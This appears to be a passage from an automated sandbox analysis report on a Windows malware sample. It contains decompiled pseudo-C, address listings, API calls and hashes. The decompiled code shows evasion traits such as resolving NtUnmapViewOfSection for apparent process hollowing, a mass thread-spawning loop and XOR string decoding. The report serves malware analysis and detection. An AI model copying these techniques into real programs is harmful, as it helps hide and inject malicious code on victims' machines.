										__eflags = _t236 - _t465 + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											L144:
											E009FCBDF(_t440, _t465, _t599, __eflags);
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_t230 = E009FE125( *((intOrPtr*)(E009F5FC0())),  *((intOrPtr*)(_t229 + 4)), _v148, _v144, _v140, 0, _t722 + 0x10);
											__eflags = _t230;
											_t231 =  <  ? _t465 | 0xffffffff : _t230;
											return  <  ? _t465 | 0xffffffff : _t230;
										} else {
											goto L134;
										}
									}
								}
								goto L146;
							}
							_t216 = _a5236687;
							_t462 = _a5236691;
							goto L131;
						}
						_t216 = _v141;
						_t462 = _v137;
						goto L131;
					}
				}
			}



































































                                                                                                                                                                          0x009f5fd0
                                                                                                                                                                          0x009f5fd0
                                                                                                                                                                          0x009f5fd0
                                                                                                                                                                          0x009f5fd0
                                                                                                                                                                          0x009f5fd0
                                                                                                                                                                          0x009f5fdb
                                                                                                                                                                          0x009f5fe4
                                                                                                                                                                          0x009f6006
                                                                                                                                                                          0x009f5fe6
                                                                                                                                                                          0x009f5fe6
                                                                                                                                                                          0x009f5feb
                                                                                                                                                                          0x009f5ff6
                                                                                                                                                                          0x009f5ffb
                                                                                                                                                                          0x009f5ffb
                                                                                                                                                                          0x009f6010
                                                                                                                                                                          0x009f6013
                                                                                                                                                                          0x009f6014
                                                                                                                                                                          0x009f6015
                                                                                                                                                                          0x009f6016
                                                                                                                                                                          0x009f601e
                                                                                                                                                                          0x009f6026
                                                                                                                                                                          0x009f602b
                                                                                                                                                                          0x009f6033
                                                                                                                                                                          0x009f6038
                                                                                                                                                                          0x009f6040
                                                                                                                                                                          0x009f6040
                                                                                                                                                                          0x009f6040
                                                                                                                                                                          0x009f6046
                                                                                                                                                                          0x009f6050
                                                                                                                                                                          0x009f6050
                                                                                                                                                                          0x009f6052
                                                                                                                                                                          0x009f6052
                                                                                                                                                                          0x009f6052
                                                                                                                                                                          0x009f6059
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f605f
                                                                                                                                                                          0x009f6066
                                                                                                                                                                          0x009f606a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6070
                                                                                                                                                                          0x009f6078
                                                                                                                                                                          0x009f6078
                                                                                                                                                                          0x009f607d
                                                                                                                                                                          0x009f6096
                                                                                                                                                                          0x009f6884
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f609c
                                                                                                                                                                          0x009f609c
                                                                                                                                                                          0x009f609f
                                                                                                                                                                          0x009f60a1
                                                                                                                                                                          0x009f6820
                                                                                                                                                                          0x009f682f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f60a7
                                                                                                                                                                          0x009f60a7
                                                                                                                                                                          0x009f60aa
                                                                                                                                                                          0x009f60ac
                                                                                                                                                                          0x009f67ed
                                                                                                                                                                          0x009f67ed
                                                                                                                                                                          0x009f67f3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f60b2
                                                                                                                                                                          0x009f60b2
                                                                                                                                                                          0x009f60b5
                                                                                                                                                                          0x009f60b7
                                                                                                                                                                          0x009f67bf
                                                                                                                                                                          0x009f67ce
                                                                                                                                                                          0x009f67ce
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f60bd
                                                                                                                                                                          0x009f60bd
                                                                                                                                                                          0x009f60c0
                                                                                                                                                                          0x009f60c2
                                                                                                                                                                          0x009f6783
                                                                                                                                                                          0x009f6783
                                                                                                                                                                          0x009f6788
                                                                                                                                                                          0x009f678a
                                                                                                                                                                          0x009f678a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f60c2
                                                                                                                                                                          0x009f60b7
                                                                                                                                                                          0x009f60ac
                                                                                                                                                                          0x009f60a1
                                                                                                                                                                          0x009f607f
                                                                                                                                                                          0x009f607f
                                                                                                                                                                          0x009f6092
                                                                                                                                                                          0x009f60c8
                                                                                                                                                                          0x009f60c8
                                                                                                                                                                          0x009f60ca
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f60d0
                                                                                                                                                                          0x009f60d8
                                                                                                                                                                          0x009f60dd
                                                                                                                                                                          0x009f60fe
                                                                                                                                                                          0x009f6100
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6106
                                                                                                                                                                          0x009f6106
                                                                                                                                                                          0x009f6106
                                                                                                                                                                          0x009f6109
                                                                                                                                                                          0x009f610b
                                                                                                                                                                          0x009f6760
                                                                                                                                                                          0x009f6762
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6111
                                                                                                                                                                          0x009f6111
                                                                                                                                                                          0x009f6114
                                                                                                                                                                          0x009f6116
                                                                                                                                                                          0x009f6717
                                                                                                                                                                          0x009f6719
                                                                                                                                                                          0x009f6719
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6116
                                                                                                                                                                          0x009f610b
                                                                                                                                                                          0x009f60df
                                                                                                                                                                          0x009f60e3
                                                                                                                                                                          0x009f60eb
                                                                                                                                                                          0x009f60eb
                                                                                                                                                                          0x009f60f6
                                                                                                                                                                          0x009f60fa
                                                                                                                                                                          0x009f6120
                                                                                                                                                                          0x009f6125
                                                                                                                                                                          0x009f64bf
                                                                                                                                                                          0x009f64c2
                                                                                                                                                                          0x009f64c4
                                                                                                                                                                          0x009f6517
                                                                                                                                                                          0x009f651a
                                                                                                                                                                          0x009f651c
                                                                                                                                                                          0x009f6543
                                                                                                                                                                          0x009f6545
                                                                                                                                                                          0x009f6563
                                                                                                                                                                          0x009f6566
                                                                                                                                                                          0x009f6568
                                                                                                                                                                          0x009f6577
                                                                                                                                                                          0x009f657a
                                                                                                                                                                          0x009f657c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6582
                                                                                                                                                                          0x009f6582
                                                                                                                                                                          0x009f6591
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6591
                                                                                                                                                                          0x009f656a
                                                                                                                                                                          0x009f656a
                                                                                                                                                                          0x009f6570
                                                                                                                                                                          0x009f67f5
                                                                                                                                                                          0x009f6802
                                                                                                                                                                          0x009f6802
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6802
                                                                                                                                                                          0x009f6547
                                                                                                                                                                          0x009f655c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f655c
                                                                                                                                                                          0x009f651e
                                                                                                                                                                          0x009f6522
                                                                                                                                                                          0x009f6538
                                                                                                                                                                          0x009f653d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f653d
                                                                                                                                                                          0x009f64c6
                                                                                                                                                                          0x009f64c6
                                                                                                                                                                          0x009f64d9
                                                                                                                                                                          0x009f64dd
                                                                                                                                                                          0x009f64dd
                                                                                                                                                                          0x009f64e0
                                                                                                                                                                          0x009f64e3
                                                                                                                                                                          0x009f64e8
                                                                                                                                                                          0x009f6704
                                                                                                                                                                          0x009f6710
                                                                                                                                                                          0x009f6710
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f64ee
                                                                                                                                                                          0x009f64ee
                                                                                                                                                                          0x009f64f4
                                                                                                                                                                          0x009f64f6
                                                                                                                                                                          0x009f6598
                                                                                                                                                                          0x009f659b
                                                                                                                                                                          0x009f659d
                                                                                                                                                                          0x009f65bb
                                                                                                                                                                          0x009f65bd
                                                                                                                                                                          0x009f65dc
                                                                                                                                                                          0x009f65df
                                                                                                                                                                          0x009f65e1
                                                                                                                                                                          0x009f65fe
                                                                                                                                                                          0x009f6601
                                                                                                                                                                          0x009f6603
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6609
                                                                                                                                                                          0x009f6609
                                                                                                                                                                          0x009f6609
                                                                                                                                                                          0x009f660c
                                                                                                                                                                          0x009f671c
                                                                                                                                                                          0x009f6726
                                                                                                                                                                          0x009f6726
                                                                                                                                                                          0x009f6728
                                                                                                                                                                          0x009f6728
                                                                                                                                                                          0x009f672c
                                                                                                                                                                          0x009f672f
                                                                                                                                                                          0x009f673b
                                                                                                                                                                          0x009f6742
                                                                                                                                                                          0x009f6746
                                                                                                                                                                          0x009f6748
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6748
                                                                                                                                                                          0x009f65e3
                                                                                                                                                                          0x009f65e7
                                                                                                                                                                          0x009f65f6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f65f6
                                                                                                                                                                          0x009f65bf
                                                                                                                                                                          0x009f65c3
                                                                                                                                                                          0x009f65d3
                                                                                                                                                                          0x009f65d6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f65d6
                                                                                                                                                                          0x009f659f
                                                                                                                                                                          0x009f65b4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f65b4
                                                                                                                                                                          0x009f64fc
                                                                                                                                                                          0x009f6500
                                                                                                                                                                          0x009f6510
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6510
                                                                                                                                                                          0x009f64f6
                                                                                                                                                                          0x009f64e8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6130
                                                                                                                                                                          0x009f6130
                                                                                                                                                                          0x009f6130
                                                                                                                                                                          0x009f6135
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f613b
                                                                                                                                                                          0x009f6140
                                                                                                                                                                          0x009f6490
                                                                                                                                                                          0x009f649b
                                                                                                                                                                          0x009f649d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6146
                                                                                                                                                                          0x009f6146
                                                                                                                                                                          0x009f614b
                                                                                                                                                                          0x009f6478
                                                                                                                                                                          0x009f647a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6151
                                                                                                                                                                          0x009f6151
                                                                                                                                                                          0x009f6156
                                                                                                                                                                          0x009f6447
                                                                                                                                                                          0x009f6456
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f615c
                                                                                                                                                                          0x009f615c
                                                                                                                                                                          0x009f6161
                                                                                                                                                                          0x009f6428
                                                                                                                                                                          0x009f6428
                                                                                                                                                                          0x009f6434
                                                                                                                                                                          0x009f643b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6167
                                                                                                                                                                          0x009f6167
                                                                                                                                                                          0x009f616f
                                                                                                                                                                          0x009f6400
                                                                                                                                                                          0x009f6413
                                                                                                                                                                          0x009f641a
                                                                                                                                                                          0x009f6422
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6175
                                                                                                                                                                          0x009f6175
                                                                                                                                                                          0x009f617d
                                                                                                                                                                          0x009f63dc
                                                                                                                                                                          0x009f63eb
                                                                                                                                                                          0x009f63fa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6183
                                                                                                                                                                          0x009f6183
                                                                                                                                                                          0x009f6188
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f618a
                                                                                                                                                                          0x009f618a
                                                                                                                                                                          0x009f618a
                                                                                                                                                                          0x009f618d
                                                                                                                                                                          0x009f618d
                                                                                                                                                                          0x009f6190
                                                                                                                                                                          0x009f6195
                                                                                                                                                                          0x009f68b1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f619b
                                                                                                                                                                          0x009f619b
                                                                                                                                                                          0x009f619b
                                                                                                                                                                          0x009f61a0
                                                                                                                                                                          0x009f689a
                                                                                                                                                                          0x009f6050
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f61a6
                                                                                                                                                                          0x009f61a6
                                                                                                                                                                          0x009f61ab
                                                                                                                                                                          0x009f6270
                                                                                                                                                                          0x009f627f
                                                                                                                                                                          0x009f6281
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f61b1
                                                                                                                                                                          0x009f61b1
                                                                                                                                                                          0x009f61b6
                                                                                                                                                                          0x009f6252
                                                                                                                                                                          0x009f6265
                                                                                                                                                                          0x009f6267
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f61bc
                                                                                                                                                                          0x009f61bc
                                                                                                                                                                          0x009f61c1
                                                                                                                                                                          0x009f639a
                                                                                                                                                                          0x009f63aa
                                                                                                                                                                          0x009f63aa
                                                                                                                                                                          0x009f63ac
                                                                                                                                                                          0x009f63ac
                                                                                                                                                                          0x009f63af
                                                                                                                                                                          0x009f66f2
                                                                                                                                                                          0x009f66f9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f63b5
                                                                                                                                                                          0x009f63b5
                                                                                                                                                                          0x009f63b8
                                                                                                                                                                          0x009f63ba
                                                                                                                                                                          0x009f6613
                                                                                                                                                                          0x009f6616
                                                                                                                                                                          0x009f6618
                                                                                                                                                                          0x009f6648
                                                                                                                                                                          0x009f664b
                                                                                                                                                                          0x009f664d
                                                                                                                                                                          0x009f666a
                                                                                                                                                                          0x009f666d
                                                                                                                                                                          0x009f666f
                                                                                                                                                                          0x009f668e
                                                                                                                                                                          0x009f6691
                                                                                                                                                                          0x009f6693
                                                                                                                                                                          0x009f66b6
                                                                                                                                                                          0x009f66b9
                                                                                                                                                                          0x009f66bb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f66c1
                                                                                                                                                                          0x009f66c7
                                                                                                                                                                          0x009f66d2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f66d2
                                                                                                                                                                          0x009f6695
                                                                                                                                                                          0x009f66a2
                                                                                                                                                                          0x009f66a9
                                                                                                                                                                          0x009f66b0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f66b0
                                                                                                                                                                          0x009f6671
                                                                                                                                                                          0x009f6684
                                                                                                                                                                          0x009f6686
                                                                                                                                                                          0x009f6687
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6687
                                                                                                                                                                          0x009f664f
                                                                                                                                                                          0x009f664f
                                                                                                                                                                          0x009f6653
                                                                                                                                                                          0x009f6663
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6663
                                                                                                                                                                          0x009f661a
                                                                                                                                                                          0x009f6637
                                                                                                                                                                          0x009f6642
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6642
                                                                                                                                                                          0x009f63c0
                                                                                                                                                                          0x009f63d7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f63d7
                                                                                                                                                                          0x009f63ba
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f61c7
                                                                                                                                                                          0x009f61c7
                                                                                                                                                                          0x009f61cc
                                                                                                                                                                          0x009f6362
                                                                                                                                                                          0x009f6372
                                                                                                                                                                          0x009f6372
                                                                                                                                                                          0x009f6374
                                                                                                                                                                          0x009f6374
                                                                                                                                                                          0x009f6377
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6379
                                                                                                                                                                          0x009f6393
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6393
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f61d2
                                                                                                                                                                          0x009f61d2
                                                                                                                                                                          0x009f61d7
                                                                                                                                                                          0x009f6350
                                                                                                                                                                          0x009f6350
                                                                                                                                                                          0x009f6352
                                                                                                                                                                          0x009f6354
                                                                                                                                                                          0x009f6354
                                                                                                                                                                          0x009f6358
                                                                                                                                                                          0x009f635c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f61dd
                                                                                                                                                                          0x009f61dd
                                                                                                                                                                          0x009f61e2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f61e8
                                                                                                                                                                          0x009f61e8
                                                                                                                                                                          0x009f61e8
                                                                                                                                                                          0x009f61eb
                                                                                                                                                                          0x009f61eb
                                                                                                                                                                          0x009f61ee
                                                                                                                                                                          0x009f61f6
                                                                                                                                                                          0x009f631e
                                                                                                                                                                          0x009f632d
                                                                                                                                                                          0x009f633c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f61fc
                                                                                                                                                                          0x009f61fc
                                                                                                                                                                          0x009f6204
                                                                                                                                                                          0x009f6303
                                                                                                                                                                          0x009f6313
                                                                                                                                                                          0x009f6315
                                                                                                                                                                          0x009f6832
                                                                                                                                                                          0x009f6835
                                                                                                                                                                          0x009f683e
                                                                                                                                                                          0x009f6847
                                                                                                                                                                          0x009f685f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f620a
                                                                                                                                                                          0x009f620a
                                                                                                                                                                          0x009f6212
                                                                                                                                                                          0x009f62ee
                                                                                                                                                                          0x009f62fc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6218
                                                                                                                                                                          0x009f6218
                                                                                                                                                                          0x009f621d
                                                                                                                                                                          0x009f62d2
                                                                                                                                                                          0x009f62e1
                                                                                                                                                                          0x009f62e3
                                                                                                                                                                          0x009f67d1
                                                                                                                                                                          0x009f67e5
                                                                                                                                                                          0x009f67e7
                                                                                                                                                                          0x009f6804
                                                                                                                                                                          0x009f6804
                                                                                                                                                                          0x009f680e
                                                                                                                                                                          0x009f6816
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6223
                                                                                                                                                                          0x009f6223
                                                                                                                                                                          0x009f6228
                                                                                                                                                                          0x009f62b6
                                                                                                                                                                          0x009f62c5
                                                                                                                                                                          0x009f62cc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f622e
                                                                                                                                                                          0x009f622e
                                                                                                                                                                          0x009f6233
                                                                                                                                                                          0x009f6299
                                                                                                                                                                          0x009f62a4
                                                                                                                                                                          0x009f62a9
                                                                                                                                                                          0x009f62b0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6235
                                                                                                                                                                          0x009f6235
                                                                                                                                                                          0x009f623a
                                                                                                                                                                          0x009f628a
                                                                                                                                                                          0x009f628a
                                                                                                                                                                          0x009f628f
                                                                                                                                                                          0x009f6291
                                                                                                                                                                          0x009f678d
                                                                                                                                                                          0x009f6791
                                                                                                                                                                          0x009f6791
                                                                                                                                                                          0x009f6793
                                                                                                                                                                          0x009f6793
                                                                                                                                                                          0x009f6795
                                                                                                                                                                          0x009f67a4
                                                                                                                                                                          0x009f67ad
                                                                                                                                                                          0x009f67b1
                                                                                                                                                                          0x009f67b5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f623c
                                                                                                                                                                          0x009f623c
                                                                                                                                                                          0x009f6241
                                                                                                                                                                          0x009f6247
                                                                                                                                                                          0x009f6247
                                                                                                                                                                          0x009f624a
                                                                                                                                                                          0x009f624a
                                                                                                                                                                          0x009f624a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6241
                                                                                                                                                                          0x009f623a
                                                                                                                                                                          0x009f6233
                                                                                                                                                                          0x009f6228
                                                                                                                                                                          0x009f621d
                                                                                                                                                                          0x009f6212
                                                                                                                                                                          0x009f6204
                                                                                                                                                                          0x009f61f6
                                                                                                                                                                          0x009f61e2
                                                                                                                                                                          0x009f61d7
                                                                                                                                                                          0x009f61cc
                                                                                                                                                                          0x009f61c1
                                                                                                                                                                          0x009f61b6
                                                                                                                                                                          0x009f61ab
                                                                                                                                                                          0x009f61a0
                                                                                                                                                                          0x009f6195
                                                                                                                                                                          0x009f6188
                                                                                                                                                                          0x009f617d
                                                                                                                                                                          0x009f616f
                                                                                                                                                                          0x009f6161
                                                                                                                                                                          0x009f6156
                                                                                                                                                                          0x009f614b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6140
                                                                                                                                                                          0x009f64b8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f64b8
                                                                                                                                                                          0x009f6125
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f60dd
                                                                                                                                                                          0x009f68b8
                                                                                                                                                                          0x009f68bf
                                                                                                                                                                          0x009f68bf
                                                                                                                                                                          0x009f68e0
                                                                                                                                                                          0x009f68e7
                                                                                                                                                                          0x009f68ec
                                                                                                                                                                          0x009f68f2
                                                                                                                                                                          0x009f68fc
                                                                                                                                                                          0x009f6901
                                                                                                                                                                          0x009f6908
                                                                                                                                                                          0x009f6909
                                                                                                                                                                          0x009f690a
                                                                                                                                                                          0x009f690b
                                                                                                                                                                          0x009f690c
                                                                                                                                                                          0x009f690f
                                                                                                                                                                          0x009f693a
                                                                                                                                                                          0x009f693a
                                                                                                                                                                          0x009f693e
                                                                                                                                                                          0x009f6941
                                                                                                                                                                          0x009f696c
                                                                                                                                                                          0x009f696c
                                                                                                                                                                          0x009f6970
                                                                                                                                                                          0x009f6973
                                                                                                                                                                          0x009f699e
                                                                                                                                                                          0x009f699e
                                                                                                                                                                          0x009f69a3
                                                                                                                                                                          0x009f69ab
                                                                                                                                                                          0x009f6975
                                                                                                                                                                          0x009f6975
                                                                                                                                                                          0x009f6979
                                                                                                                                                                          0x009f697a
                                                                                                                                                                          0x009f697c
                                                                                                                                                                          0x009f6982
                                                                                                                                                                          0x009f6994
                                                                                                                                                                          0x009f6994
                                                                                                                                                                          0x009f6996
                                                                                                                                                                          0x009f699b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6984
                                                                                                                                                                          0x009f6984
                                                                                                                                                                          0x009f6987
                                                                                                                                                                          0x009f698f
                                                                                                                                                                          0x009f6992
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6992
                                                                                                                                                                          0x009f6982
                                                                                                                                                                          0x009f6943
                                                                                                                                                                          0x009f6943
                                                                                                                                                                          0x009f6947
                                                                                                                                                                          0x009f6948
                                                                                                                                                                          0x009f694a
                                                                                                                                                                          0x009f6950
                                                                                                                                                                          0x009f6962
                                                                                                                                                                          0x009f6962
                                                                                                                                                                          0x009f6964
                                                                                                                                                                          0x009f6969
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6952
                                                                                                                                                                          0x009f6952
                                                                                                                                                                          0x009f6955
                                                                                                                                                                          0x009f695d
                                                                                                                                                                          0x009f6960
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6960
                                                                                                                                                                          0x009f6950
                                                                                                                                                                          0x009f6911
                                                                                                                                                                          0x009f6911
                                                                                                                                                                          0x009f6915
                                                                                                                                                                          0x009f6916
                                                                                                                                                                          0x009f6918
                                                                                                                                                                          0x009f691e
                                                                                                                                                                          0x009f6930
                                                                                                                                                                          0x009f6930
                                                                                                                                                                          0x009f6932
                                                                                                                                                                          0x009f6937
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f6920
                                                                                                                                                                          0x009f6920
                                                                                                                                                                          0x009f6923
                                                                                                                                                                          0x009f692b
                                                                                                                                                                          0x009f692e
                                                                                                                                                                          0x009f69ac
                                                                                                                                                                          0x009f69ac
                                                                                                                                                                          0x009f69b1
                                                                                                                                                                          0x009f69b2
                                                                                                                                                                          0x009f69b3
                                                                                                                                                                          0x009f69b4
                                                                                                                                                                          0x009f69b5
                                                                                                                                                                          0x009f69b6
                                                                                                                                                                          0x009f69b7
                                                                                                                                                                          0x009f69b8
                                                                                                                                                                          0x009f69b9
                                                                                                                                                                          0x009f69ba
                                                                                                                                                                          0x009f69bb
                                                                                                                                                                          0x009f69bc
                                                                                                                                                                          0x009f69bd
                                                                                                                                                                          0x009f69be
                                                                                                                                                                          0x009f69bf
                                                                                                                                                                          0x009f69dd
                                                                                                                                                                          0x009f69e8
                                                                                                                                                                          0x009f69ea
                                                                                                                                                                          0x009f69ed
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f692e
                                                                                                                                                                          0x009f691e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f690f
                                                                                                                                                                          0x009f68c8
                                                                                                                                                                          0x009f68cf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f68cf
                                                                                                                                                                          0x009f68d8
                                                                                                                                                                          0x009f68dc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f68dc
                                                                                                                                                                          0x009f6050

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 009F5FDB
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 009F6006
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 009F68EC
                                                                                                                                                                          • FreeConsole.KERNEL32 ref: 009F68F2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressConsoleCurrentFreeHandleModuleProcProcess
                                                                                                                                                                          • String ID: Could not get a handle to ntdll.dll.$NtUnmapViewOfSection$ntdll.dll$uEFG
                                                                                                                                                                          • API String ID: 367398363-3241177887
                                                                                                                                                                          • Opcode ID: 380573f17226a1f3685b13e46ee9c5509c982daa7568fb2951fc85d27af68f2e
                                                                                                                                                                          • Instruction ID: d3df30e62a39b1fdd4bf1cfbc7630a8e198ee5f579ee73d23d62b98a13a38900
                                                                                                                                                                          • Opcode Fuzzy Hash: 380573f17226a1f3685b13e46ee9c5509c982daa7568fb2951fc85d27af68f2e
                                                                                                                                                                          • Instruction Fuzzy Hash: 7552F63650430A8FD704DE34C0E15FAB7E6EB92358F604E5CD5E187242E76AE90FAB91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009F5BF0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 194threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 261 9f5bf0-9f5bfb 262 9f5c00-9f5c14 CreateThread 261->262 262->262 263 9f5c16-9f5c32 GetCurrentProcess call 9f3270 262->263 266 9f5c34-9f5c3f 263->266 266->266 267 9f5c41-9f5c5a 266->267 268 9f5c60-9f5c65 267->268 268->268 269 9f5c67-9f5d60 call 9f4430 call 9f3470 call 9f5790 MultiByteToWideChar 268->269 276 9f5d6d-9f5d74 call 9f4290 269->276 277 9f5d62-9f5d6b 269->277 278 9f5d79-9f5de1 MultiByteToWideChar call 9f5790 call a22181 276->278 277->278 282 9f5de3-9f5def 278->282 283 9f5df1-9f5e04 282->283 284 9f5e20-9f5e3e 282->284 285 9f5e16-9f5e1d call 9f89fd 283->285 286 9f5e06-9f5e14 283->286 287 9f5e69-9f5e6c 284->287 288 9f5e40-9f5e4d 284->288 285->284 286->285 289 9f5e6d-9f5e72 call 9fcbdf 286->289 291 9f5e5f-9f5e66 call 9f89fd 288->291 292 9f5e4f-9f5e5d 288->292 291->287 292->289 292->291
                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                          			E009F5BF0(void* __ebx, void* __edi, void* __esi, void* __ebp) {
				char _v65;
				intOrPtr _v72;
				intOrPtr _v76;
				void* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				char _v100;
				signed int _v104;
				int _v108;
				signed int _v112;
				int _v116;
				void* _v117;
				int _v124;
				intOrPtr _v128;
				signed int _v132;
				signed int* _t52;
				signed int _t53;
				int _t59;
				signed int _t67;
				int _t68;
				signed int _t77;
				signed int* _t84;
				int _t90;
				signed int _t91;
				signed int* _t92;
				signed int* _t93;
				signed int _t94;
				intOrPtr _t95;
				void* _t96;
				void* _t98;
				signed int* _t101;
				int _t103;
				void* _t104;
				void* _t106;
				char _t107;
				int _t108;
				void* _t113;
				void* _t114;
				void* _t117;
				void* _t118;

				_t112 = __ebp;
				_t81 = __ebx;
				_t114 = _t113 - 0x74;
				_push(__edi);
				_t106 = 0x5bf5;
				do {
					CreateThread(0, 0, E009F35C0, 0, 0, 0); // executed
					_t106 = _t106 - 1;
				} while (_t106 != 0);
				GetCurrentProcess();
				_t52 = E009F3270( &_v65);
				_t107 = 0x3b;
				_t3 =  &(_t52[0]); // 0x1
				_t101 = _t3;
				_t92 = _t101;
				do {
					_t92 =  &(_t92[0]);
					 *(_t92 - 1) =  *(_t92 - 1) ^  *_t52;
					_t107 = _t107 - 1;
				} while (_t107 != 0);
				_t84 = _t101;
				_t52[0xf] = 0;
				_v92 = _t107;
				_v76 = _t107;
				_v72 = 0xf;
				_t11 =  &(_t84[0]); // 0x2
				_t93 = _t11;
				asm("o16 nop [eax+eax]");
				do {
					_t53 =  *_t84;
					_t84 =  &(_t84[0]);
					_t122 = _t53;
